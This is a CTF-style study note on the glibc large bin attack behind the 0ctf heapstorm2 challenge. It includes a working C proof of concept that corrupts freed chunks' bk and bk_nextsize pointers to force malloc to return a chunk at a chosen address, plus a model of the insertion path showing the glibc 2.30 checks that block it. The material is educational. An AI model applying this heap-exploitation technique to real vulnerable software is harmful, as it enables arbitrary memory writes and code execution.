large bin attack study notes

Over the past couple of days I looked into some large bin attack material. One of the attack methods is fairly useless: it only lets you alloc from inside a chunk whose contents you control, but the unsorted bin can already do that with much less hassle.

Then I remembered that 0ctf quals had a challenge, heapstorm2, that is also a large bin attack, so I went and looked at it.

Here is the blog post from the dalao (expert):

Largebin 学习 (Largebin study)

It is really well explained.

Then I read the write-up of heapstorm2, which was genuinely stunning: a very elegant attack method.

To summarize: when an unsorted bin chunk is inserted into the large bin list, it triggers a write of a heap address to an arbitrary address.

Then, after leaving the unsorted bin loop, there is another write of a heap address to an arbitrary address.

With those you can forge a chunk of size 0x50.

At that point you can effectively alloc wherever you want.

The attack method can be summarized in the C code below:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

int main()
{
    // only for init
    setbuf(stdin, 0);
    setbuf(stdout, 0);

    // map memory at a fixed address (PROT_READ|PROT_WRITE = 3, MAP_PRIVATE|MAP_ANONYMOUS = 34)
    mmap((void *)0x13370000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    // malloc 2 large-bin-sized chunks, each followed by a small chunk so they don't merge with top
    long long *h1 = malloc(0x418);
    malloc(0x18);
    long long *h2 = malloc(0x428);
    malloc(0x18);

    // put the smaller one into the large bin list
    free(h1);
    malloc(0x500);

    // put the bigger one into the unsorted bin list
    free(h2);

    // change the smaller one's bk and bk_nextsize; the 0xdeadbeef values only show that fd and fd_nextsize don't matter
    h1[0] = 0xdeadbeef;            // fd
    h1[1] = 0x13370000 - 0x10 + 3; // bk
    h1[2] = 0xdeadbeef;            // fd_nextsize
    h1[3] = 0x13370018 - 0x20;     // bk_nextsize

    // change the unsorted bin chunk's bk
    h2[0] = 0xdeadbeef; // fd
    h2[1] = 0x13370000; // bk

    // trigger the bug and alloc where you want, but it needs some luck
    long long *h3 = malloc(0x48);
    printf("you are lucky and got %p\n", h3);
    return 0;
}
```
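Added here as an illustration, not code from the original post or from glibc itself: a small C model of the large bin insertion path that the summary above relies on, showing the two heap-pointer writes and the list-integrity checks that glibc 2.30 added in front of them. The chunk layout, the sizes 0x420/0x430, the static chunks `bin`, `a`, `victim`, `fake` and the functions `largebin_insert` and `demo` are all constructed for this model.

```c
#include <stddef.h>
#include <string.h>
/* Minimal model of glibc's 64-bit malloc_chunk (only the link fields matter). */
typedef struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk, *fd_nextsize, *bk_nextsize;
} chunk;
enum { OK = 0, ERR_NEXTSIZE = 1, ERR_BK = 2 };
/* Unsorted->large bin insertion from _int_malloc for a victim larger than
 * every chunk already in the bin (the heapstorm2 case; glibc's "smaller than
 * smallest" shortcut branch is left out). hardened=1 adds the two list
 * integrity checks glibc 2.30 introduced, which run before the writes. */
int largebin_insert(chunk *bin, chunk *victim, int hardened)
{
    chunk *bck = bin, *fwd = bin->fd;
    size_t size = victim->size | 1;                  /* PREV_INUSE for compare */
    if (fwd == bck) {                                /* empty bin: self-linked */
        victim->fd_nextsize = victim->bk_nextsize = victim;
    } else {
        while (size < fwd->size) fwd = fwd->fd_nextsize;
        if (size == fwd->size) {
            fwd = fwd->fd;                           /* equal size: 2nd position */
        } else {
            victim->fd_nextsize = fwd;
            victim->bk_nextsize = fwd->bk_nextsize;  /* attacker-controlled if fwd is */
            if (hardened && fwd->bk_nextsize->fd_nextsize != fwd)
                return ERR_NEXTSIZE;                 /* "corrupted (nextsize)" */
            fwd->bk_nextsize = victim;
            victim->bk_nextsize->fd_nextsize = victim;   /* write #1: heap pointer */
        }
        bck = fwd->bk;                               /* attacker-controlled if fwd is */
        if (hardened && bck->fd != fwd) return ERR_BK;   /* "corrupted (bk)" */
    }
    victim->bk = bck; victim->fd = fwd; fwd->bk = victim;
    bck->fd = victim;                                /* write #2: heap pointer */
    return OK;
}
/* Constructed scenario on static structs (no real heap): the bin holds one
 * chunk 'a' (0x420) and 'victim' (0x430) is inserted. corrupt=1 points a's bk
 * and bk_nextsize at 'fake' (like h1[1]/h1[3] above), corrupt=2 only its bk. */
static chunk bin, a, victim, fake;
int demo(int corrupt, int hardened)
{
    memset(&bin, 0, sizeof bin);       memset(&a, 0, sizeof a);
    memset(&victim, 0, sizeof victim); memset(&fake, 0, sizeof fake);
    bin.fd = bin.bk = &a;  a.size = 0x421;  victim.size = 0x431;
    a.fd = a.bk = &bin;    a.fd_nextsize = a.bk_nextsize = &a;
    if (corrupt >= 1) a.bk = &fake;
    if (corrupt == 1) a.bk_nextsize = &fake;
    return largebin_insert(&bin, &victim, hardened);
}
```

Without the checks, `demo(1, 0)` leaves a pointer to `victim` in both `fake.fd_nextsize` and `fake.fd`, which is exactly the pair of heap-address writes the summary describes; with them, the same corruption is refused before any write lands.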